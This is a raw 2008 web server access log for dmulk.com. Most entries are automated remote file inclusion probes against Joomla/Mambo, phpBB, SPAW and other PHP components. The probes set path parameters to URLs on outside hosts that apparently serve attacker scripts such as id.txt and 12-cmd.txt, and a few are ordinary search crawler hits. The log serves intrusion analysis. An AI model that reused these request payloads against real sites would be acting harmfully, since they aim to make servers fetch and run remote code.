89.108.66.188 - - [13/Jul/2008:13:16:41 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:17:37 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:17:38 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:17:38 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:17:59 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:18:12 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:18:13 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:18:26 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:19:23 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:19:23 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:13:19:28 -0700] "GET /logs/access_080313.log/index1.php?=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:19:32 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:19:33 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:19:33 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:13:19:45 -0700] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:13:20:13 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
68.142.212.191 - - [13/Jul/2008:13:20:13 -0700] "GET /blog/wp-content/uploads/picture-015-800x600.jpg HTTP/1.0" 200 160195 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
88.214.192.29 - - [13/Jul/2008:13:20:14 -0700] "GET /logs/access_080103.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.170.160 - - [13/Jul/2008:13:20:35 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:13:20:38 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:13:20:38 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.170.160 - - [13/Jul/2008:13:20:41 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 200 18595 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:21:13 -0700] "GET /logs/access_071224.log//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:21:13 -0700] "GET /logs/access_071224.log//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:21:53 -0700] "GET /logs/access_080329.log/index.php?sayfa=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:21:56 -0700] "GET /index.php?sayfa=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:21:57 -0700] "GET /logs/index.php?sayfa=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.231.141 - - [13/Jul/2008:13:21:59 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aphpdeveloper.co.uk/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:22:35 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:22:35 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:22:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:22:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:23:23 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:24:19 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:13:24:20 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.170.160 - - [13/Jul/2008:13:24:23 -0700] "GET /logs/access_080325.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.170.160 - - [13/Jul/2008:13:24:32 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [13/Jul/2008:13:24:36 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/trackback/ HTTP/1.0" 200 9429 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
203.146.170.160 - - [13/Jul/2008:13:24:36 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 200 18595 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:25:13 -0700] "GET /logs/access_080326.log//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:13:25:13 -0700] "GET /logs/access_080228.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:25:15 -0700] "GET /logs/access_080326.log//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:13:25:23 -0700] "GET /logs/access_071224.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.125 - - [13/Jul/2008:13:25:25 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/trackback/ HTTP/1.0" 200 9428 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [13/Jul/2008:13:25:25 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [13/Jul/2008:13:25:25 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [13/Jul/2008:13:25:25 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/trackback/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:25:52 -0700] "GET /logs/access.log/index.php?sayfa=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:13:25:53 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:13:25:53 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:13:25:54 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:25:54 -0700] "GET /logs/access_080229.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:13:27:06 -0700] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:13:27:06 -0700] "GET //includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:27:21 -0700] "GET /logs/access_080229.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:27:21 -0700] "GET /logs/access_080229.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:13:28:00 -0700] "GET //includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:13:28:02 -0700] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:13:28:18 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:13:28:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:13:28:18 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:13:28:46 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:29:44 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:29:44 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:29:45 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.195.51.243 - - [13/Jul/2008:13:29:46 -0700] "GET / HTTP/1.0" 200 18241 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:29:46 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:29:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:29:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:13:30:02 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:13:30:05 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:13:30:06 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:13:30:08 -0700] "GET /logs/access_080329.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:30:29 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:30:40 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:13:30:52 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:13:30:53 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:13:30:53 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:31:10 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:31:11 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:31:11 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:13:31:21 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:13:31:22 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:13:31:23 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.163.130 - - [13/Jul/2008:13:31:24 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:13:31:28 -0700] "GET /logs/access.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:13:32:03 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:13:32:06 -0700] "GET /logs/access_080228.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:32:09 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:32:09 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.169.18.172 - - [13/Jul/2008:13:32:56 -0700] "GET /logs/access_080322.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.169.18.172 - - [13/Jul/2008:13:32:56 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.169.18.172 - - [13/Jul/2008:13:32:57 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.169.18.172 - - [13/Jul/2008:13:33:43 -0700] "GET /logs/access_080228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.69.204.75 - - [13/Jul/2008:13:35:32 -0700] "GET /logs/access.log/vbgsitemap/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [13/Jul/2008:13:35:32 -0700] "GET /vbgsitemap/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [13/Jul/2008:13:35:32 -0700] "GET /logs/vbgsitemap/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:35:38 -0700] "GET /logs/access_080329.log/index.php?sayfa=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:35:40 -0700] "GET /logs/access_080329.log/index.php?sayfa=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:35:52 -0700] "GET /logs/index.php?sayfa=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:35:52 -0700] "GET /logs/index.php?sayfa=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:36:44 -0700] "GET /logs/access_080218.log//index.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:36:48 -0700] "GET //index.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 200 18431 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:36:49 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.151.202.2 - - [13/Jul/2008:13:37:56 -0700] "GET /logs/security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://www.asa.ba/eng//administrator/components/com_chronocontact/excelwriter/Writer/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.151.202.2 - - [13/Jul/2008:13:38:02 -0700] "GET /security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://www.asa.ba/eng//administrator/components/com_chronocontact/excelwriter/Writer/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:38:23 -0700] "GET /logs/access.log//index.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:13:38:27 -0700] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:38:27 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:13:38:33 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
